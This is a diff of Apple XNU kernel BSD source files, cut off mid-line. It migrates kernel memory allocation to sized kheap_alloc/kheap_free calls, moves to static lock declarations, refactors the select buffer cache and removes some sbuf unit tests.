SBUF_TESTING("sbuf_copyin") - { - SBUF_SHOULD("succeed in the simple case") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - SBUF_ASSERT_EQ(req->newlen, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("use the sbuf capacity if len is zero") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, 0)); - SBUF_ASSERT_EQ(req->newlen, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if we can't extend the sbuf to accommodate") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - - sbuf_delete(s); - } - - SBUF_SHOULD("auto-extend the buffer if necessary") - { - struct sbuf *s = NULL; - int len_before; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - len_before = s->s_len; - SBUF_ASSERT_NE(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - SBUF_ASSERT_GT(len_before, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if the sbuf is overflowed") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail gracefully for an invalid address") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (void *)0xdeadUL, req->newlen)); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail gracefully for a kernel address") - { - struct sbuf *s = NULL; - const char *ptr = "abcd"; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, ptr, strlen(ptr))); - - sbuf_delete(s); - } - } - SBUF_TEST_END; } diff --git a/bsd/kern/sys_generic.c b/bsd/kern/sys_generic.c index 77b32e3d4..1d88f75a8 100644 --- a/bsd/kern/sys_generic.c +++ b/bsd/kern/sys_generic.c @@ -152,6 +152,11 @@ /* for entitlement check */ #include +/* + * If you need accounting for KM_SELECT consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_SELECT KHEAP_DEFAULT /* XXX should be in a header file somewhere */ extern kern_return_t IOBSDGetPlatformUUID(__darwin_uuid_t uuid, mach_timespec_t timeoutp); @@ -1210,6 +1215,36 @@ pselect_nocancel(struct proc *p, struct pselect_nocancel_args *uap, int32_t *ret return err; } +void +select_cleanup_uthread(struct _select *sel) +{ + kheap_free(KHEAP_DATA_BUFFERS, sel->ibits, 2 * sel->nbytes); + sel->ibits = sel->obits = NULL; + sel->nbytes = 0; +} + +static int +select_grow_uthread_cache(struct _select *sel, uint32_t nbytes) +{ + uint32_t *buf; + + buf = kheap_alloc(KHEAP_DATA_BUFFERS, 2 * nbytes, Z_WAITOK | Z_ZERO); + if (buf) { + select_cleanup_uthread(sel); + sel->ibits = buf; + sel->obits = buf + nbytes / sizeof(uint32_t); + sel->nbytes = nbytes; + return true; + } + return false; +} + +static void +select_bzero_uthread_cache(struct _select *sel) +{ + bzero(sel->ibits, sel->nbytes * 2); +} + /* * Generic implementation of {,p}select. Care: we type-pun uap across the two * syscalls, which differ slightly. The first 4 arguments (nfds and the fd sets) @@ -1226,7 +1261,6 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo struct uthread *uth; struct _select *sel; struct _select_data *seldata; - int needzerofill = 1; int count = 0; size_t sz = 0; @@ -1266,35 +1300,11 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo * it is not a POSIX compliant error code for select(). */ if (sel->nbytes < (3 * ni)) { - int nbytes = 3 * ni; - - /* Free previous allocation, if any */ - if (sel->ibits != NULL) { - FREE(sel->ibits, M_TEMP); - } - if (sel->obits != NULL) { - FREE(sel->obits, M_TEMP); - /* NULL out; subsequent ibits allocation may fail */ - sel->obits = NULL; - } - - MALLOC(sel->ibits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO); - if (sel->ibits == NULL) { - return EAGAIN; - } - MALLOC(sel->obits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO); - if (sel->obits == NULL) { - FREE(sel->ibits, M_TEMP); - sel->ibits = NULL; + if (!select_grow_uthread_cache(sel, 3 * ni)) { return EAGAIN; } - sel->nbytes = nbytes; - needzerofill = 0; - } - - if (needzerofill) { - bzero((caddr_t)sel->ibits, sel->nbytes); - bzero((caddr_t)sel->obits, sel->nbytes); + } else { + select_bzero_uthread_cache(sel); } /* @@ -1347,14 +1357,14 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo if (waitq_set_is_valid(uth->uu_wqset)) { waitq_set_deinit(uth->uu_wqset); } - FREE(uth->uu_wqset, M_SELECT); + kheap_free(KM_SELECT, uth->uu_wqset, uth->uu_wqstate_sz); } else if (uth->uu_wqstate_sz && !uth->uu_wqset) { panic("select: thread structure corrupt! " "uu_wqstate_sz:%ld, wqstate_buf == NULL", uth->uu_wqstate_sz); } uth->uu_wqstate_sz = sz; - MALLOC(uth->uu_wqset, struct waitq_set *, sz, M_SELECT, M_WAITOK); + uth->uu_wqset = kheap_alloc(KM_SELECT, sz, Z_WAITOK); if (!uth->uu_wqset) { panic("can't allocate %ld bytes for wqstate buffer", uth->uu_wqstate_sz); @@ -1834,6 +1844,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval) u_int nfds = uap->nfds; u_int rfds = 0; rlim_t nofile = proc_limitgetcur(p, RLIMIT_NOFILE, TRUE); + size_t ni = nfds * sizeof(struct pollfd); /* * This is kinda bogus. We have fd limits, but that is not @@ -1853,8 +1864,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval) } if (nfds) { - size_t ni = nfds * sizeof(struct pollfd); - MALLOC(fds, struct pollfd *, ni, M_TEMP, M_WAITOK); + fds = kheap_alloc(KHEAP_TEMP, ni, Z_WAITOK); if (NULL == fds) { error = EAGAIN; goto out; @@ -1979,9 +1989,7 @@ done: } out: - if (NULL != fds) { - FREE(fds, M_TEMP); - } + kheap_free(KHEAP_TEMP, fds, ni); kqueue_dealloc(kq); return error; @@ -3231,15 +3239,21 @@ SYSCTL_PROC(_machdep_remotetime, OID_AUTO, conversion_params, #endif /* CONFIG_MACH_BRIDGE_RECV_TIME */ #if DEVELOPMENT || DEBUG -#if __AMP__ + #include extern int32_t sysctl_get_bound_cpuid(void); -extern void sysctl_thread_bind_cpuid(int32_t cpuid); +extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid); static int sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS { #pragma unused(oidp, arg1, arg2) + /* + * DO NOT remove this bootarg guard or make this non-development. + * This kind of binding should only be used for tests and + * experiments in a custom configuration, never shipping code. + */ + if (!PE_parse_boot_argn("enable_skstb", NULL, 0)) { return ENOENT; } @@ -3254,7 +3268,15 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS } if (changed) { - sysctl_thread_bind_cpuid(new_value); + kern_return_t kr = sysctl_thread_bind_cpuid(new_value); + + if (kr == KERN_NOT_SUPPORTED) { + return ENOTSUP; + } + + if (kr == KERN_INVALID_VALUE) { + return ERANGE; + } } return error; @@ -3263,6 +3285,7 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS SYSCTL_PROC(_kern, OID_AUTO, sched_thread_bind_cpu, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED, 0, 0, sysctl_kern_sched_thread_bind_cpu, "I", ""); +#if __AMP__ extern char sysctl_get_bound_cluster_type(void); extern void sysctl_thread_bind_cluster_type(char cluster_type); static int @@ -3404,6 +3427,12 @@ SYSCTL_INT(_kern, OID_AUTO, sched_edge_migrate_ipi_immediate, CTLFLAG_RW | CTLFL #endif /* CONFIG_SCHED_EDGE */ #endif /* __AMP__ */ + +/* used for testing by exception_tests */ +extern uint32_t ipc_control_port_options; +SYSCTL_INT(_kern, OID_AUTO, ipc_control_port_options, + CTLFLAG_RD | CTLFLAG_LOCKED, &ipc_control_port_options, 0, ""); + #endif /* DEVELOPMENT || DEBUG */ extern uint32_t task_exc_guard_default; diff --git a/bsd/kern/sys_persona.c b/bsd/kern/sys_persona.c index d44ad74bf..2889c1019 100644 --- a/bsd/kern/sys_persona.c +++ b/bsd/kern/sys_persona.c @@ -433,8 +433,8 @@ kpersona_find_syscall(user_addr_t infop, user_addr_t idp, user_addr_t idlenp) login = kinfo.persona_name[0] ? kinfo.persona_name : NULL; if (u_idlen > 0) { - MALLOC(persona, struct persona **, sizeof(*persona) * u_idlen, - M_TEMP, M_WAITOK | M_ZERO); + persona = kheap_alloc(KHEAP_TEMP, sizeof(*persona) * u_idlen, + Z_WAITOK | Z_ZERO); if (!persona) { error = ENOMEM; goto out; @@ -465,7 +465,7 @@ out: for (size_t i = 0; i < u_idlen; i++) { persona_put(persona[i]); } - FREE(persona, M_TEMP); + kheap_free(KHEAP_TEMP, persona, sizeof(*persona) * u_idlen); } (void)copyout(&k_idlen, idlenp, sizeof(u_idlen)); diff --git a/bsd/kern/sys_reason.c b/bsd/kern/sys_reason.c index 6a773e495..ed84e0ab5 100644 --- a/bsd/kern/sys_reason.c +++ b/bsd/kern/sys_reason.c @@ -35,12 +35,6 @@ #include #include -#if OS_REASON_DEBUG -#include - -extern int os_reason_debug_disabled; -#endif - extern int maxproc; /* @@ -52,25 +46,9 @@ static ZONE_DECLARE(os_reason_zone, "os reasons", os_refgrp_decl(static, os_reason_refgrp, "os_reason", NULL); -#define OS_REASON_RESERVE_COUNT 100 - static int os_reason_alloc_buffer_internal(os_reason_t cur_reason, uint32_t osr_bufsize, zalloc_flags_t flags); -void -os_reason_init(void) -{ - int reasons_allocated = 0; - - /* - * We pre-fill the OS reason zone to reduce the likelihood that - * the jetsam thread and others block when they create an exit - * reason. - */ - reasons_allocated = zfill(os_reason_zone, OS_REASON_RESERVE_COUNT); - assert(reasons_allocated >= OS_REASON_RESERVE_COUNT); -} - /* * Creates a new reason and initializes it with the provided reason * namespace and code. Also sets up the buffer and kcdata_descriptor diff --git a/bsd/kern/syscalls.master b/bsd/kern/syscalls.master index c2802385f..3d55687cd 100644 --- a/bsd/kern/syscalls.master +++ b/bsd/kern/syscalls.master @@ -856,7 +856,7 @@ 536 AUE_NULL ALL { int shared_region_map_and_slide_2_np(uint32_t files_count, const struct shared_file_np *files, uint32_t mappings_count, const struct shared_file_mapping_slide_np *mappings) NO_SYSCALL_STUB; } 537 AUE_NULL ALL { int pivot_root(const char *new_rootfs_path_before, const char *old_rootfs_path_after); } 538 AUE_TASKINSPECTFORPID ALL { int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); } -539 AUE_TASKINSPECTFORPID ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); } +539 AUE_TASKREADFORPID ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); } 540 AUE_PREADV ALL { user_ssize_t sys_preadv(int fd, struct iovec *iovp, int iovcnt, off_t offset); } 541 AUE_PWRITEV ALL { user_ssize_t sys_pwritev(int fd, struct iovec *iovp, int iovcnt, off_t offset); } 542 AUE_PREADV ALL { user_ssize_t sys_preadv_nocancel(int fd, struct iovec *iovp, int iovcnt, off_t offset) NO_SYSCALL_STUB; } diff --git a/bsd/kern/sysv_msg.c b/bsd/kern/sysv_msg.c index 5769cf276..afddde8c2 100644 --- a/bsd/kern/sysv_msg.c +++ b/bsd/kern/sysv_msg.c @@ -103,17 +103,12 @@ struct msgmap *msgmaps; /* MSGSEG msgmap structures */ struct msg *msghdrs; /* MSGTQL msg headers */ struct msqid_kernel *msqids; /* MSGMNI msqid_kernel structs (wrapping user_msqid_ds structs) */ -static lck_grp_t *sysv_msg_subsys_lck_grp; -static lck_grp_attr_t *sysv_msg_subsys_lck_grp_attr; -static lck_attr_t *sysv_msg_subsys_lck_attr; -static lck_mtx_t sysv_msg_subsys_mutex; +static LCK_GRP_DECLARE(sysv_msg_subsys_lck_grp, "sysv_msg_subsys_lock"); +static LCK_MTX_DECLARE(sysv_msg_subsys_mutex, &sysv_msg_subsys_lck_grp); #define SYSV_MSG_SUBSYS_LOCK() lck_mtx_lock(&sysv_msg_subsys_mutex) #define SYSV_MSG_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_msg_subsys_mutex) -void sysv_msg_lock_init(void); - - #ifdef __APPLE_API_PRIVATE int msgmax, /* max chars in a message */ msgmni, /* max message queue identifiers */ @@ -131,18 +126,6 @@ struct msginfo msginfo = { }; #endif /* __APPLE_API_PRIVATE */ -/* Initialize the mutex governing access to the SysV msg subsystem */ -__private_extern__ void -sysv_msg_lock_init( void ) -{ - sysv_msg_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - sysv_msg_subsys_lck_grp = lck_grp_alloc_init("sysv_msg_subsys_lock", sysv_msg_subsys_lck_grp_attr); - - sysv_msg_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&sysv_msg_subsys_mutex, sysv_msg_subsys_lck_grp, sysv_msg_subsys_lck_attr); -} - static __inline__ user_time_t sysv_msgtime(void) { @@ -252,30 +235,27 @@ msginit(__unused void *dummy) * if this fails, fail safely and leave it uninitialized (related * system calls will fail). */ - msgpool = (char *)_MALLOC(msginfo.msgmax, M_SHM, M_WAITOK); + msgpool = kheap_alloc(KHEAP_DATA_BUFFERS, msginfo.msgmax, Z_WAITOK); if (msgpool == NULL) { printf("msginit: can't allocate msgpool"); goto bad; } - MALLOC(msgmaps, struct msgmap *, - sizeof(struct msgmap) * msginfo.msgseg, - M_SHM, M_WAITOK); + msgmaps = kheap_alloc(KM_SHM, sizeof(struct msgmap) * msginfo.msgseg, + Z_WAITOK); if (msgmaps == NULL) { printf("msginit: can't allocate msgmaps"); goto bad; } - MALLOC(msghdrs, struct msg *, - sizeof(struct msg) * msginfo.msgtql, - M_SHM, M_WAITOK); + msghdrs = kheap_alloc(KM_SHM, sizeof(struct msg) * msginfo.msgtql, + Z_WAITOK); if (msghdrs == NULL) { printf("msginit: can't allocate msghdrs"); goto bad; } - MALLOC(msqids, struct msqid_kernel *, - sizeof(struct msqid_kernel) * msginfo.msgmni, - M_SHM, M_WAITOK); + msqids = kheap_alloc(KM_SHM, + sizeof(struct msqid_kernel) * msginfo.msgmni, Z_WAITOK); if (msqids == NULL) { printf("msginit: can't allocate msqids"); goto bad; @@ -319,18 +299,14 @@ msginit(__unused void *dummy) initted = 1; bad: if (!initted) { - if (msgpool != NULL) { - _FREE(msgpool, M_SHM); - } - if (msgmaps != NULL) { - FREE(msgmaps, M_SHM); - } - if (msghdrs != NULL) { - FREE(msghdrs, M_SHM); - } - if (msqids != NULL) { - FREE(msqids, M_SHM); - } + kheap_free(KHEAP_DATA_BUFFERS, msgpool, + sizeof(struct msgmap) * msginfo.msgseg); + kheap_free(KM_SHM, msgmaps, + sizeof(struct msgmap) * msginfo.msgseg); + kheap_free(KM_SHM, msghdrs, + sizeof(struct msg) * msginfo.msgtql); + kheap_free(KM_SHM, msqids, + sizeof(struct msqid_kernel) * msginfo.msgmni); } return initted; } @@ -1467,12 +1443,11 @@ msgrcv_nocancel(struct proc *p, struct msgrcv_nocancel_args *uap, user_ssize_t * for (len = 0; len < msgsz; len += msginfo.msgssz) { size_t tlen; - /* compare input (size_t) value against restrict (int) value */ - if (msgsz > (size_t)msginfo.msgssz) { - tlen = msginfo.msgssz; - } else { - tlen = msgsz; - } + /* + * copy the full segment, or less if we're at the end + * of the message + */ + tlen = MIN(msgsz - len, (size_t)msginfo.msgssz); if (next <= -1) { panic("next too low #3"); } diff --git a/bsd/kern/sysv_sem.c b/bsd/kern/sysv_sem.c index cf284cd82..f7ab8e39c 100644 --- a/bsd/kern/sysv_sem.c +++ b/bsd/kern/sysv_sem.c @@ -78,7 +78,7 @@ #define MPRINTF(a) #endif -#define M_SYSVSEM M_TEMP +#define KM_SYSVSEM KHEAP_DEFAULT /* Hard system limits to avoid resource starvation / DOS attacks. @@ -133,27 +133,12 @@ static int semu_list_idx = -1; /* active undo structures */ struct sem_undo *semu = NULL; /* semaphore undo pool */ -void sysv_sem_lock_init(void); -static lck_grp_t *sysv_sem_subsys_lck_grp; -static lck_grp_attr_t *sysv_sem_subsys_lck_grp_attr; -static lck_attr_t *sysv_sem_subsys_lck_attr; -static lck_mtx_t sysv_sem_subsys_mutex; +static LCK_GRP_DECLARE(sysv_sem_subsys_lck_grp, "sysv_sem_subsys_lock"); +static LCK_MTX_DECLARE(sysv_sem_subsys_mutex, &sysv_sem_subsys_lck_grp); #define SYSV_SEM_SUBSYS_LOCK() lck_mtx_lock(&sysv_sem_subsys_mutex) #define SYSV_SEM_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_sem_subsys_mutex) - -__private_extern__ void -sysv_sem_lock_init( void ) -{ - sysv_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - sysv_sem_subsys_lck_grp = lck_grp_alloc_init("sysv_sem_subsys_lock", sysv_sem_subsys_lck_grp_attr); - - sysv_sem_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&sysv_sem_subsys_mutex, sysv_sem_subsys_lck_grp, sysv_sem_subsys_lck_attr); -} - static __inline__ user_time_t sysv_semtime(void) { @@ -283,8 +268,8 @@ grow_semu_array(int newSize) #ifdef SEM_DEBUG printf("growing semu[] from %d to %d\n", seminfo.semmnu, newSize); #endif - MALLOC(newSemu, struct sem_undo *, sizeof(struct sem_undo) * newSize, - M_SYSVSEM, M_WAITOK | M_ZERO); + newSemu = kheap_alloc(KM_SYSVSEM, sizeof(struct sem_undo) * newSize, + Z_WAITOK | Z_ZERO); if (NULL == newSemu) { #ifdef SEM_DEBUG printf("allocation failed. no changes made.\n"); @@ -298,14 +283,12 @@ grow_semu_array(int newSize) } /* * The new elements (from newSemu[i] to newSemu[newSize-1]) have their - * "un_proc" set to 0 (i.e. NULL) by the M_ZERO flag to MALLOC() above, - * so they're already marked as "not in use". + * "un_proc" set to 0 (i.e. NULL) by the Z_ZERO flag to kheap_alloc + * above, so they're already marked as "not in use". */ /* Clean up the old array */ - if (semu) { - FREE(semu, M_SYSVSEM); - } + kheap_free(KM_SYSVSEM, semu, sizeof(struct sem_undo) * seminfo.semmnu); semu = newSemu; seminfo.semmnu = newSize; @@ -343,9 +326,8 @@ grow_sema_array(int newSize) #ifdef SEM_DEBUG printf("growing sema[] from %d to %d\n", seminfo.semmni, newSize); #endif - MALLOC(newSema, struct semid_kernel *, - sizeof(struct semid_kernel) * newSize, - M_SYSVSEM, M_WAITOK | M_ZERO); + newSema = kheap_alloc(KM_SYSVSEM, sizeof(struct semid_kernel) * newSize, + Z_WAITOK | Z_ZERO); if (NULL == newSema) { #ifdef SEM_DEBUG printf("allocation failed. no changes made.\n"); @@ -377,14 +359,13 @@ grow_sema_array(int newSize) /* * The new elements (from newSema[i] to newSema[newSize-1]) have their - * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the M_ZERO - * flag to MALLOC() above, so they're already marked as "not in use". + * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the Z_ZERO + * flag to kheap_alloc above, so they're already marked as "not in use". */ /* Clean up the old array */ - if (sema) { - FREE(sema, M_SYSVSEM); - } + kheap_free(KM_SYSVSEM, sema, + sizeof(struct semid_kernel) * seminfo.semmni); sema = newSema; seminfo.semmni = newSize; @@ -425,8 +406,8 @@ grow_sem_pool(int new_pool_size) #ifdef SEM_DEBUG printf("growing sem_pool array from %d to %d\n", seminfo.semmns, new_pool_size); #endif - MALLOC(new_sem_pool, struct sem *, sizeof(struct sem) * new_pool_size, - M_SYSVSEM, M_WAITOK | M_ZERO | M_NULL); + new_sem_pool = kheap_alloc(KM_SYSVSEM, sizeof(struct sem) * new_pool_size, + Z_WAITOK | Z_ZERO); if (NULL == new_sem_pool) { #ifdef SEM_DEBUG printf("allocation failed. no changes made.\n"); @@ -453,9 +434,7 @@ grow_sem_pool(int new_pool_size) sem_pool = new_sem_pool; /* clean up the old array */ - if (sem_free != NULL) { - FREE(sem_free, M_SYSVSEM); - } + kheap_free(KM_SYSVSEM, sem_free, sizeof(struct sem) * seminfo.semmns); seminfo.semmns = new_pool_size; #ifdef SEM_DEBUG @@ -606,8 +585,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid, if (sueptr->une_adjval == 0) { suptr->un_cnt--; *suepptr = sueptr->une_next; - FREE(sueptr, M_SYSVSEM); - sueptr = NULL; + kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo)); } return 0; } @@ -624,8 +602,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid, } /* allocate a new semaphore undo entry */ - MALLOC(new_sueptr, struct undo *, sizeof(struct undo), - M_SYSVSEM, M_WAITOK); + new_sueptr = kheap_alloc(KM_SYSVSEM, sizeof(struct undo), Z_WAITOK); if (new_sueptr == NULL) { return ENOMEM; } @@ -662,7 +639,7 @@ semundo_clear(int semid, int semnum) if (semnum == -1 || sueptr->une_num == semnum) { suptr->un_cnt--; *suepptr = sueptr->une_next; - FREE(sueptr, M_SYSVSEM); + kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo)); sueptr = *suepptr; continue; } @@ -1533,8 +1510,7 @@ semexit(struct proc *p) #endif suptr->un_cnt--; suptr->un_ent = sueptr->une_next; - FREE(sueptr, M_SYSVSEM); - sueptr = NULL; + kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo)); } } diff --git a/bsd/kern/sysv_shm.c b/bsd/kern/sysv_shm.c index 7e778e60d..a3a6ea933 100644 --- a/bsd/kern/sysv_shm.c +++ b/bsd/kern/sysv_shm.c @@ -109,10 +109,8 @@ #if SYSV_SHM static int shminit(void); -static lck_grp_t *sysv_shm_subsys_lck_grp; -static lck_grp_attr_t *sysv_shm_subsys_lck_grp_attr; -static lck_attr_t *sysv_shm_subsys_lck_attr; -static lck_mtx_t sysv_shm_subsys_mutex; +static LCK_GRP_DECLARE(sysv_shm_subsys_lck_grp, "sysv_shm_subsys_lock"); +static LCK_MTX_DECLARE(sysv_shm_subsys_mutex, &sysv_shm_subsys_lck_grp); #define SYSV_SHM_SUBSYS_LOCK() lck_mtx_lock(&sysv_shm_subsys_mutex) #define SYSV_SHM_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_shm_subsys_mutex) @@ -183,8 +181,6 @@ struct shminfo shminfo = { #endif /* __APPLE_API_PRIVATE */ -void sysv_shm_lock_init(void); - static __inline__ time_t sysv_shmtime(void) { @@ -277,7 +273,7 @@ shm_deallocate_segment(struct shmid_kernel *shmseg) shm_handle = shm_handle_next) { shm_handle_next = shm_handle->shm_handle_next; mach_memory_entry_port_release(shm_handle->shm_object); - FREE(shm_handle, M_SHM); + kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle)); } shmseg->u.shm_internal = USER_ADDR_NULL; /* tunnel */ size = vm_map_round_page(shmseg->u.shm_segsz, @@ -421,7 +417,7 @@ shmat(struct proc *p, struct shmat_args *uap, user_addr_t *retval) goto shmat_out; } - MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK | M_NULL); + shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK); if (shmmap_s == NULL) { shmat_ret = ENOMEM; goto shmat_out; @@ -838,7 +834,7 @@ shmget_allocate_segment(struct proc *p, struct shmget_args *uap, int mode, goto out; } - MALLOC(shm_handle, struct shm_handle *, sizeof(struct shm_handle), M_SHM, M_WAITOK); + shm_handle = kheap_alloc(KM_SHM, sizeof(struct shm_handle), Z_WAITOK); if (shm_handle == NULL) { kret = KERN_NO_SPACE; mach_memory_entry_port_release(mem_object); @@ -891,7 +887,7 @@ out: shm_handle = shm_handle_next) { shm_handle_next = shm_handle->shm_handle_next; mach_memory_entry_port_release(shm_handle->shm_object); - FREE(shm_handle, M_SHM); + kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle)); } shmseg->u.shm_internal = USER_ADDR_NULL; /* tunnel */ } @@ -1006,7 +1002,7 @@ shmfork(struct proc *p1, struct proc *p2) ret = 1; goto shmfork_out; } - MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK); + shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK); if (shmmap_s == NULL) { ret = 1; goto shmfork_out; @@ -1029,11 +1025,14 @@ static void shmcleanup(struct proc *p, int deallocate) { struct shmmap_state *shmmap_s; + size_t size = 0; + int nsegs = 0; SYSV_SHM_SUBSYS_LOCK(); shmmap_s = (struct shmmap_state *)p->vm_shm; for (; shmmap_s->shmid != SHMID_SENTINEL; shmmap_s++) { + nsegs++; if (SHMID_IS_VALID(shmmap_s->shmid)) { /* * XXX: Should the MAC framework enforce @@ -1043,8 +1042,10 @@ shmcleanup(struct proc *p, int deallocate) } } - FREE(p->vm_shm, M_SHM); - p->vm_shm = NULL; + if (os_add_and_mul_overflow(nsegs, 1, sizeof(struct shmmap_state), &size)) { + panic("shmcleanup: p->vm_shm buffer was correupted\n"); + } + kheap_free(KM_SHM, p->vm_shm, size); SYSV_SHM_SUBSYS_UNLOCK(); } @@ -1084,7 +1085,7 @@ shminit(void) return ENOMEM; } - MALLOC(shmsegs, struct shmid_kernel *, sz, M_SHM, M_WAITOK | M_ZERO); + shmsegs = zalloc_permanent(sz, ZALIGN_PTR); if (shmsegs == NULL) { return ENOMEM; } @@ -1104,18 +1105,6 @@ shminit(void) return 0; } -/* Initialize the mutex governing access to the SysV shm subsystem */ -__private_extern__ void -sysv_shm_lock_init( void ) -{ - sysv_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - sysv_shm_subsys_lck_grp = lck_grp_alloc_init("sysv_shm_subsys_lock", sysv_shm_subsys_lck_grp_attr); - - sysv_shm_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&sysv_shm_subsys_mutex, sysv_shm_subsys_lck_grp, sysv_shm_subsys_lck_attr); -} - /* (struct sysctl_oid *oidp, void *arg1, int arg2, \ * struct sysctl_req *req) */ static int diff --git a/bsd/kern/trace_codes b/bsd/kern/trace_codes index 14858edc5..400a97a94 100644 --- a/bsd/kern/trace_codes +++ b/bsd/kern/trace_codes @@ -445,6 +445,8 @@ 0x14000E8 MACH_AMP_RECOMMENDATION_CHANGE 0x14000EC MACH_AMP_PERFCTL_POLICY_CHANGE 0x1400100 MACH_TURNSTILE_KERNEL_CHANGE +0x140010C MACH_SET_RT_DEADLINE +0x1400110 MACH_CANCEL_RT_DEADLINE 0x1400140 MACH_PSET_AVG_EXEC_TIME 0x1500000 MACH_MSGID_INVALID 0x1600000 MTX_SLEEP @@ -1148,6 +1150,7 @@ 0x313016C VFS_label_associate_fdesc 0x3130170 VFS_mount_check_snapshot_mount 0x3130174 VFS_check_supplemental_signature +0X3134000 VFS_io_compression_stats 0x3CF0000 CP_OFFSET_IO 0x4010004 proc_exit 0x4010008 force_exit @@ -1631,6 +1634,8 @@ 0x01ab000c WORKGROUP_INTERVAL_START 0x01ab0010 WORKGROUP_INTERVAL_UPDATE 0x01ab0014 WORKGROUP_INTERVAL_FINISH +0x01ac0000 HV_GUEST_ENTER +0x01ac0004 HV_GUEST_ERROR 0x1e000000 SEC_ENTROPY_READ0 0x1e000004 SEC_ENTROPY_READ1 0x1e000008 SEC_ENTROPY_READ2 diff --git a/bsd/kern/tty.c b/bsd/kern/tty.c index fbb861b00..ba9f72cfb 100644 --- a/bsd/kern/tty.c +++ b/bsd/kern/tty.c @@ -116,9 +116,7 @@ #include #include -static lck_grp_t *tty_lck_grp; -static lck_grp_attr_t *tty_lck_grp_attr; -static lck_attr_t *tty_lck_attr; +static LCK_GRP_DECLARE(tty_lck_grp, "tty"); __private_extern__ int ttnread(struct tty *tp); static void ttyecho(int c, struct tty *tp); @@ -260,32 +258,6 @@ termios64to32(struct user_termios *in, struct termios32 *out) } -/* - * tty_init - * - * Initialize the tty line discipline subsystem. - * - * Parameters: void - * - * Returns: void - * - * Locks: No ttys can be allocated and no tty locks can be used - * until after this function is called - * - * Notes: The intent of this is to set up a log group attribute, - * lock group, and loc atribute for subsequent per-tty locks. - * This function is called early in bsd_init(), prior to the - * console device initialization. - */ -void -tty_init(void) -{ - tty_lck_grp_attr = lck_grp_attr_alloc_init(); - tty_lck_grp = lck_grp_alloc_init("tty", tty_lck_grp_attr); - tty_lck_attr = lck_attr_alloc_init(); -} - - /* * tty_lock * @@ -3198,14 +3170,14 @@ ttymalloc(void) { struct tty *tp; - MALLOC(tp, struct tty *, sizeof(struct tty), M_TTYS, M_WAITOK | M_ZERO); + tp = kheap_alloc(KM_TTYS, sizeof(struct tty), Z_WAITOK | Z_ZERO); if (tp != NULL) { /* XXX: default to TTYCLSIZE(1024) chars for now */ clalloc(&tp->t_rawq, TTYCLSIZE, 1); clalloc(&tp->t_canq, TTYCLSIZE, 1); /* output queue doesn't need quoting */ clalloc(&tp->t_outq, TTYCLSIZE, 0); - lck_mtx_init(&tp->t_lock, 